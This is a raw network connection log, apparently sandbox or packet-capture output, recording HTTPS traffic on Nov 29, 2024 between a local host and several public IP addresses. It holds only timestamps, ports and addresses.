Nov 29, 2024 12:27:25.958168983 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:25.958201885 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:25.958278894 CET	49708	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:25.958297014 CET	443	49708	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:25.960608006 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:25.960658073 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:25.960688114 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:25.963680983 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:25.965142012 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:25.966061115 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:25.966167927 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:25.967272043 CET	49709	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:25.967329025 CET	443	49709	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:25.967391968 CET	49709	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:25.967654943 CET	49709	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:25.967668056 CET	443	49709	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:26.083729982 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:26.085124016 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:26.086149931 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:26.086257935 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:26.146936893 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:26.149847984 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:26.270329952 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:26.281078100 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:26.281203032 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:26.281270981 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:26.283466101 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:26.283556938 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:26.283651114 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:26.286994934 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:26.288095951 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:26.288548946 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:26.288953066 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:26.408179045 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:26.408890963 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:26.448620081 CET	49677	80	192.168.2.8	192.229.211.108
Nov 29, 2024 12:27:26.473026991 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:26.475650072 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:26.604496956 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:26.604563951 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:26.604629040 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:26.607323885 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:26.607446909 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:26.607513905 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:26.609672070 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:26.610861063 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:26.611879110 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:26.611978054 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:26.730901957 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:26.732136965 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:26.796309948 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:26.800232887 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:26.961926937 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:26.997335911 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:26.997487068 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:26.997545004 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:27.000169992 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:27.000220060 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:27.000264883 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:27.000269890 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:27.003773928 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:27.003839016 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:27.003858089 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:27.009736061 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:27.009805918 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:27.023169994 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:27.023612022 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:27.024043083 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:27.024302959 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:27.143265009 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:27.143613100 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:27.143910885 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:27.144175053 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:27.189086914 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:27.189193964 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:27.189245939 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:27.191915989 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:27.311933041 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:27.341738939 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:27.341768980 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:27.341834068 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:27.345047951 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:27.346149921 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:27.381248951 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:27.381306887 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:27.381380081 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:27.384397984 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:27.384666920 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:27.434729099 CET	443	49709	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:27.437849045 CET	49709	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:27.438256979 CET	49709	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:27.438265085 CET	443	49709	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:27.439949036 CET	49709	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:27.439953089 CET	443	49709	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:27.466180086 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:27.504606962 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:27.533368111 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:27.536300898 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:27.666455030 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:27.666466951 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:27.666666985 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:27.710549116 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:27.710716009 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:27.710787058 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:27.856638908 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:27.901684999 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:28.427588940 CET	443	49709	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:28.427608013 CET	443	49709	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:28.427674055 CET	443	49709	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:28.427757978 CET	49709	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:28.427757978 CET	49709	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:28.428195953 CET	49709	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:28.428215027 CET	443	49709	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:28.439898968 CET	49710	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:28.439944029 CET	443	49710	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:28.440067053 CET	49710	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:28.440290928 CET	49710	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:28.440301895 CET	443	49710	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:28.579375029 CET	443	49704	23.206.229.226	192.168.2.8
Nov 29, 2024 12:27:28.579462051 CET	49704	443	192.168.2.8	23.206.229.226
Nov 29, 2024 12:27:29.859807968 CET	443	49710	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:29.860188961 CET	49710	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:29.860908985 CET	49710	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:29.860918045 CET	443	49710	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:29.862680912 CET	49710	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:29.862685919 CET	443	49710	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:30.842120886 CET	443	49710	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:30.842153072 CET	443	49710	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:30.842209101 CET	49710	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:30.842230082 CET	443	49710	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:30.842233896 CET	49710	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:30.842277050 CET	49710	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:30.842609882 CET	49710	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:30.842628002 CET	443	49710	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:30.849411011 CET	49711	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:30.849453926 CET	443	49711	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:30.849509001 CET	49711	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:30.849802971 CET	49711	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:30.849816084 CET	443	49711	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:32.317193985 CET	443	49711	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:32.317317963 CET	49711	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:32.318487883 CET	49711	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:32.318500996 CET	443	49711	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:32.320333958 CET	49711	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:32.320338964 CET	443	49711	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:33.310492039 CET	443	49711	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:33.310570955 CET	443	49711	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:33.310606956 CET	49711	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:33.310650110 CET	49711	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:33.310936928 CET	49711	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:33.310966015 CET	443	49711	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:33.394658089 CET	49712	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:33.394710064 CET	443	49712	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:33.394787073 CET	49712	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:33.395176888 CET	49712	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:33.395191908 CET	443	49712	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:33.836431026 CET	49713	443	192.168.2.8	20.109.210.53
Nov 29, 2024 12:27:33.836478949 CET	443	49713	20.109.210.53	192.168.2.8
Nov 29, 2024 12:27:33.836548090 CET	49713	443	192.168.2.8	20.109.210.53
Nov 29, 2024 12:27:33.849010944 CET	49713	443	192.168.2.8	20.109.210.53
Nov 29, 2024 12:27:33.849050045 CET	443	49713	20.109.210.53	192.168.2.8
Nov 29, 2024 12:27:34.411664009 CET	49714	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:34.411684990 CET	443	49714	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:34.411751986 CET	49714	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:34.412240982 CET	49714	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:34.412249088 CET	443	49714	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:34.861788034 CET	443	49712	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:34.861917019 CET	49712	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:34.862354040 CET	49712	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:34.862365961 CET	443	49712	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:34.877835989 CET	49712	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:34.877866030 CET	443	49712	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:34.877909899 CET	49712	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:34.877922058 CET	443	49712	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:35.621090889 CET	443	49713	20.109.210.53	192.168.2.8
Nov 29, 2024 12:27:35.621190071 CET	49713	443	192.168.2.8	20.109.210.53
Nov 29, 2024 12:27:35.623318911 CET	49713	443	192.168.2.8	20.109.210.53
Nov 29, 2024 12:27:35.623341084 CET	443	49713	20.109.210.53	192.168.2.8
Nov 29, 2024 12:27:35.623662949 CET	443	49713	20.109.210.53	192.168.2.8
Nov 29, 2024 12:27:35.667319059 CET	49713	443	192.168.2.8	20.109.210.53
Nov 29, 2024 12:27:35.761703968 CET	49713	443	192.168.2.8	20.109.210.53
Nov 29, 2024 12:27:35.807343006 CET	443	49713	20.109.210.53	192.168.2.8
Nov 29, 2024 12:27:35.885212898 CET	443	49714	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:35.885296106 CET	49714	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:35.885736942 CET	49714	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:35.885747910 CET	443	49714	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:35.917486906 CET	49714	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:35.917529106 CET	443	49714	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:35.945719004 CET	443	49712	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:35.945792913 CET	49712	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:35.945800066 CET	443	49712	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:35.947652102 CET	49712	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:35.947742939 CET	49712	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:35.947761059 CET	443	49712	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:36.344316006 CET	443	49713	20.109.210.53	192.168.2.8
Nov 29, 2024 12:27:36.344347000 CET	443	49713	20.109.210.53	192.168.2.8
Nov 29, 2024 12:27:36.344353914 CET	443	49713	20.109.210.53	192.168.2.8
Nov 29, 2024 12:27:36.344366074 CET	443	49713	20.109.210.53	192.168.2.8
Nov 29, 2024 12:27:36.344414949 CET	443	49713	20.109.210.53	192.168.2.8
Nov 29, 2024 12:27:36.344563961 CET	49713	443	192.168.2.8	20.109.210.53
Nov 29, 2024 12:27:36.344595909 CET	443	49713	20.109.210.53	192.168.2.8
Nov 29, 2024 12:27:36.344656944 CET	49713	443	192.168.2.8	20.109.210.53
Nov 29, 2024 12:27:36.365243912 CET	443	49713	20.109.210.53	192.168.2.8
Nov 29, 2024 12:27:36.365326881 CET	49713	443	192.168.2.8	20.109.210.53
Nov 29, 2024 12:27:36.365340948 CET	443	49713	20.109.210.53	192.168.2.8
Nov 29, 2024 12:27:36.365353107 CET	443	49713	20.109.210.53	192.168.2.8
Nov 29, 2024 12:27:36.365408897 CET	49713	443	192.168.2.8	20.109.210.53
Nov 29, 2024 12:27:36.366307974 CET	49713	443	192.168.2.8	20.109.210.53
Nov 29, 2024 12:27:36.366323948 CET	443	49713	20.109.210.53	192.168.2.8
Nov 29, 2024 12:27:36.366334915 CET	49713	443	192.168.2.8	20.109.210.53
Nov 29, 2024 12:27:36.366341114 CET	443	49713	20.109.210.53	192.168.2.8
Nov 29, 2024 12:27:37.045198917 CET	443	49714	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:37.045268059 CET	443	49714	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:37.045284033 CET	49714	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:37.045310974 CET	49714	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:37.046281099 CET	49714	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:37.046307087 CET	443	49714	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:39.601063967 CET	49718	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:39.601108074 CET	443	49718	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:39.601164103 CET	49718	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:39.601385117 CET	49718	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:39.601399899 CET	443	49718	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:41.240360975 CET	49722	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:41.240391016 CET	443	49722	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:41.240603924 CET	49722	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:41.240854979 CET	49722	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:41.240865946 CET	443	49722	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:41.287399054 CET	49723	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:41.287450075 CET	443	49723	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:41.287518024 CET	49723	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:41.287949085 CET	49723	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:41.287965059 CET	443	49723	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:41.301670074 CET	443	49718	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:41.301877022 CET	49718	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:41.301893950 CET	443	49718	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:41.302905083 CET	443	49718	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:41.302964926 CET	49718	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:41.304020882 CET	49718	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:41.304083109 CET	443	49718	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:41.304358959 CET	49724	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:41.304392099 CET	443	49724	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:41.304445028 CET	49724	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:41.304502010 CET	49718	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:41.304507017 CET	443	49718	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:41.304647923 CET	49724	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:41.304660082 CET	443	49724	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:41.348246098 CET	49718	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:42.140424967 CET	443	49718	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:42.140594959 CET	443	49718	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:42.140655994 CET	49718	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:42.142445087 CET	49718	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:42.142467022 CET	443	49718	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:42.976566076 CET	443	49722	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:42.978003025 CET	49722	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:42.978018045 CET	443	49722	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:42.979037046 CET	443	49722	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:42.979094982 CET	49722	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:42.979373932 CET	49722	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:42.979432106 CET	443	49722	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:42.979522943 CET	49722	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:43.023343086 CET	443	49722	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:43.028269053 CET	49728	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:43.028302908 CET	443	49728	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:43.028376102 CET	49728	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:43.028639078 CET	49728	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:43.028655052 CET	443	49728	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:43.033792019 CET	49722	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:43.033814907 CET	443	49722	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:43.042402983 CET	443	49724	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:43.073427916 CET	443	49723	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:43.080678940 CET	49722	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:43.096302986 CET	49724	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:43.102219105 CET	49723	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:43.102250099 CET	443	49723	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:43.102371931 CET	49724	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:43.102391005 CET	443	49724	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:43.102864027 CET	443	49724	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:43.103158951 CET	49724	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:43.103229046 CET	443	49724	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:43.103291988 CET	49724	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:43.103425980 CET	443	49723	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:43.103482008 CET	49723	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:43.103768110 CET	49723	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:43.103848934 CET	443	49723	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:43.143194914 CET	49723	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:43.143224955 CET	443	49723	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:43.143341064 CET	443	49724	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:43.190063000 CET	49723	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:43.853513956 CET	443	49722	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:43.853570938 CET	443	49722	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:43.853602886 CET	443	49722	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:43.853641033 CET	443	49722	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:43.853660107 CET	49722	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:43.853689909 CET	443	49722	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:43.853702068 CET	49722	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:43.861653090 CET	443	49722	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:43.861711025 CET	49722	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:43.861718893 CET	443	49722	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:43.871279955 CET	443	49722	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:43.871336937 CET	49722	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:43.871344090 CET	443	49722	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:43.885792017 CET	443	49722	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:43.885845900 CET	443	49722	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:43.885848999 CET	49722	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:43.885857105 CET	443	49722	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:43.885900021 CET	49722	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:43.896547079 CET	443	49724	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:43.896675110 CET	443	49724	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:43.896739006 CET	49724	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:43.897449970 CET	49724	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:43.897463083 CET	443	49724	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:44.041341066 CET	443	49722	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:44.045464993 CET	443	49722	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:44.045512915 CET	49722	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:44.045550108 CET	443	49722	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:44.059905052 CET	443	49722	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:44.059952021 CET	49722	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:44.059967041 CET	443	49722	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:44.069595098 CET	443	49722	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:44.069653988 CET	49722	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:44.069665909 CET	443	49722	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:44.079740047 CET	443	49722	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:44.079788923 CET	49722	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:44.079797029 CET	443	49722	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:44.095365047 CET	443	49722	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:44.095431089 CET	49722	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:44.095446110 CET	443	49722	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:44.107796907 CET	443	49722	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:44.107846022 CET	49722	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:44.107857943 CET	443	49722	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:44.120987892 CET	443	49722	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:44.121038914 CET	49722	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:44.121066093 CET	443	49722	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:44.134033918 CET	443	49722	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:44.134087086 CET	49722	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:44.134116888 CET	443	49722	142.250.181.68	192.168.2.8
Nov 29, 2024 12:27:44.143939018 CET	49729	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:44.143987894 CET	443	49729	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:44.144058943 CET	49729	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:44.144292116 CET	49729	443	192.168.2.8	95.217.25.228
